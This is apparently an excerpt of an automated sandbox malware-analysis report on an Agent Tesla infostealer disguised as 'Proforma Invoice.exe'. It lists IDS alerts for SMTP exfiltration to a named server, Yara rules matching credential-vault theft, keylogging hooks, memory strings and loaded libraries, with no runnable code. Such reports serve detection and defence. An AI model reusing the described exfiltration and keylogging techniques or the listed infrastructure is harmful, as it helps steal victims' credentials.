Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 4x nop then jmp 050BCADCh		0_2_050BCE00
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Code function: 4x nop then jmp 0717BDC4h		9_2_0717C0E8

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49736 -> 50.87.139.143:587
Source: Traffic	Snort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.4:49736 -> 50.87.139.143:587
Source: Traffic	Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49736 -> 50.87.139.143:587
Source: Traffic	Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49736 -> 50.87.139.143:587
Source: Traffic	Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49736 -> 50.87.139.143:587
Source: Traffic	Snort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49739 -> 50.87.139.143:587
Source: Traffic	Snort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.4:49739 -> 50.87.139.143:587
Source: Traffic	Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49739 -> 50.87.139.143:587
Source: Traffic	Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49739 -> 50.87.139.143:587
Source: Traffic	Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49739 -> 50.87.139.143:587

Yara detected Generic Downloader

Source: Yara match	File source: 0.2.Proforma Invoice.exe.3943ce8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Proforma Invoice.exe.39090c8.6.raw.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.4:49736 -> 50.87.139.143:587

Source: Joe Sandbox View	IP Address: 50.87.139.143 50.87.139.143
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152

Source: Joe Sandbox View

ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: global traffic

TCP traffic: 192.168.2.4:49736 -> 50.87.139.143:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: api.ipify.org

Source: Proforma Invoice.exe, VoAlKljQu.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: Proforma Invoice.exe, VoAlKljQu.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: Proforma Invoice.exe, 00000008.00000002.4093089949.00000000030F9000.00000004.00000800.00020000.00000000.sdmp, VoAlKljQu.exe, 0000000D.00000002.4093089236.0000000002C3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.elec-qatar.com
Source: Proforma Invoice.exe, VoAlKljQu.exe.0.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: Proforma Invoice.exe, 00000000.00000002.1685780768.00000000025D0000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000002.4093089949.0000000003081000.00000004.00000800.00020000.00000000.sdmp, VoAlKljQu.exe, 00000009.00000002.1726797038.0000000002B80000.00000004.00000800.00020000.00000000.sdmp, VoAlKljQu.exe, 0000000D.00000002.4093089236.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: Proforma Invoice.exe, 00000000.00000002.1686647135.0000000003870000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000000.00000002.1686647135.0000000004202000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000002.4089522808.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: Proforma Invoice.exe, 00000000.00000002.1686647135.0000000003870000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000000.00000002.1686647135.0000000004202000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000002.4089522808.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000002.4093089949.0000000003081000.00000004.00000800.00020000.00000000.sdmp, VoAlKljQu.exe, 0000000D.00000002.4093089236.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: Proforma Invoice.exe, 00000008.00000002.4093089949.0000000003081000.00000004.00000800.00020000.00000000.sdmp, VoAlKljQu.exe, 0000000D.00000002.4090730561.0000000000D74000.00000004.00000020.00020000.00000000.sdmp, VoAlKljQu.exe, 0000000D.00000002.4093089236.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: Proforma Invoice.exe, 00000008.00000002.4093089949.0000000003081000.00000004.00000800.00020000.00000000.sdmp, VoAlKljQu.exe, 0000000D.00000002.4093089236.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t
Source: Proforma Invoice.exe, VoAlKljQu.exe.0.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443

Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49738 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.Proforma Invoice.exe.39090c8.6.raw.unpack, K6jmfEUYzg.cs	.Net Code: aft6g33EiG
Source: 0.2.Proforma Invoice.exe.3943ce8.9.raw.unpack, K6jmfEUYzg.cs	.Net Code: aft6g33EiG

Installs a global keyboard hook

Source: C:\Users\user\Desktop\Proforma Invoice.exe	Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\Proforma Invoice.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\VoAlKljQu.exe

Source: C:\Users\user\Desktop\Proforma Invoice.exe	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Window created: window name: CLIPBRDWNDCLASS

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.Proforma Invoice.exe.3943ce8.9.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 8.2.Proforma Invoice.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Proforma Invoice.exe.3943ce8.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Proforma Invoice.exe.39090c8.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Proforma Invoice.exe.39090c8.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Proforma Invoice.exe

Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_050B6669	0_2_050B6669
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_050B8188	0_2_050B8188
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_050BF090	0_2_050BF090
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_050B7D3F	0_2_050B7D3F
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_050B7D50	0_2_050B7D50
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_050B8B88	0_2_050B8B88
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_050B6AAC	0_2_050B6AAC
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_050B6AA0	0_2_050B6AA0
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_050B6AB0	0_2_050B6AB0
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_06ECEAC0	0_2_06ECEAC0
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_06EC6AE8	0_2_06EC6AE8
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_06ECE3D0	0_2_06ECE3D0
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_06EC0040	0_2_06EC0040
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_06EC0006	0_2_06EC0006
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 8_2_013CE6B0	8_2_013CE6B0
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 8_2_013CA960	8_2_013CA960
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 8_2_013C4A98	8_2_013C4A98
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 8_2_013C3E80	8_2_013C3E80
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 8_2_013C41C8	8_2_013C41C8
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 8_2_06C265E8	8_2_06C265E8
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 8_2_06C27D90	8_2_06C27D90
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 8_2_06C255A0	8_2_06C255A0
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 8_2_06C2B248	8_2_06C2B248
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 8_2_06C22350	8_2_06C22350
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 8_2_06C27698	8_2_06C27698
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 8_2_06C25CF0	8_2_06C25CF0
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 8_2_06C2E3A8	8_2_06C2E3A8
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 8_2_06C20040	8_2_06C20040
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 8_2_06C20015	8_2_06C20015
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 8_2_06D11820	8_2_06D11820
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 8_2_06D11908	8_2_06D11908
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 8_2_06C2019F	8_2_06C2019F
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Code function: 9_2_0520FC40	9_2_0520FC40
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Code function: 9_2_052093A8	9_2_052093A8
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Code function: 9_2_052093B8	9_2_052093B8
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Code function: 9_2_052073BC	9_2_052073BC
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Code function: 9_2_0520FC30	9_2_0520FC30
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Code function: 9_2_07173A88	9_2_07173A88
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Code function: 9_2_07176678	9_2_07176678
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Code function: 9_2_0717E388	9_2_0717E388
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Code function: 9_2_07178188	9_2_07178188
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Code function: 9_2_07177D50	9_2_07177D50
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Code function: 9_2_07177D4B	9_2_07177D4B
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Code function: 9_2_07178B88	9_2_07178B88
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Code function: 9_2_07173A78	9_2_07173A78
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Code function: 9_2_07176AB0	9_2_07176AB0
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Code function: 9_2_07176AA0	9_2_07176AA0
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Code function: 9_2_0719EAC0	9_2_0719EAC0
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Code function: 9_2_0719E3D0	9_2_0719E3D0
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Code function: 9_2_07196AE8	9_2_07196AE8
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Code function: 9_2_07190007	9_2_07190007
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Code function: 9_2_07190040	9_2_07190040
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Code function: 13_2_0103E6A1	13_2_0103E6A1
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Code function: 13_2_01034A98	13_2_01034A98
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Code function: 13_2_01033E80	13_2_01033E80
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Code function: 13_2_010341C8	13_2_010341C8
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Code function: 13_2_0103A960	13_2_0103A960
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Code function: 13_2_066B55A0	13_2_066B55A0
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Code function: 13_2_066B7D90	13_2_066B7D90
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Code function: 13_2_066BB238	13_2_066BB238
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Code function: 13_2_066B3058	13_2_066B3058
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Code function: 13_2_066B7698	13_2_066B7698
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Code function: 13_2_066B5CDF	13_2_066B5CDF
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Code function: 13_2_066B2340	13_2_066B2340
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Code function: 13_2_066BE3A8	13_2_066BE3A8
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Code function: 13_2_066B0040	13_2_066B0040
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Code function: 13_2_066B0006	13_2_066B0006
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Code function: 13_2_066B0536	13_2_066B0536

Source: Proforma Invoice.exe

Static PE information: invalid certificate

Source: Proforma Invoice.exe, 00000000.00000002.1683476539.000000000073E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Proforma Invoice.exe
Source: Proforma Invoice.exe, 00000000.00000002.1686647135.0000000003870000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename1aa5ed53-faea-433c-bf5f-9e47e14be233.exe4 vs Proforma Invoice.exe
Source: Proforma Invoice.exe, 00000000.00000002.1686647135.0000000003870000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs Proforma Invoice.exe
Source: Proforma Invoice.exe, 00000000.00000000.1634199768.00000000001D2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamePznx.exe* vs Proforma Invoice.exe
Source: Proforma Invoice.exe, 00000000.00000002.1685780768.0000000002638000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename1aa5ed53-faea-433c-bf5f-9e47e14be233.exe4 vs Proforma Invoice.exe
Source: Proforma Invoice.exe, 00000000.00000002.1690910619.00000000070F0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs Proforma Invoice.exe
Source: Proforma Invoice.exe, 00000008.00000002.4089943461.0000000000DE9000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Proforma Invoice.exe
Source: Proforma Invoice.exe	Binary or memory string: OriginalFilenamePznx.exe* vs Proforma Invoice.exe

Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
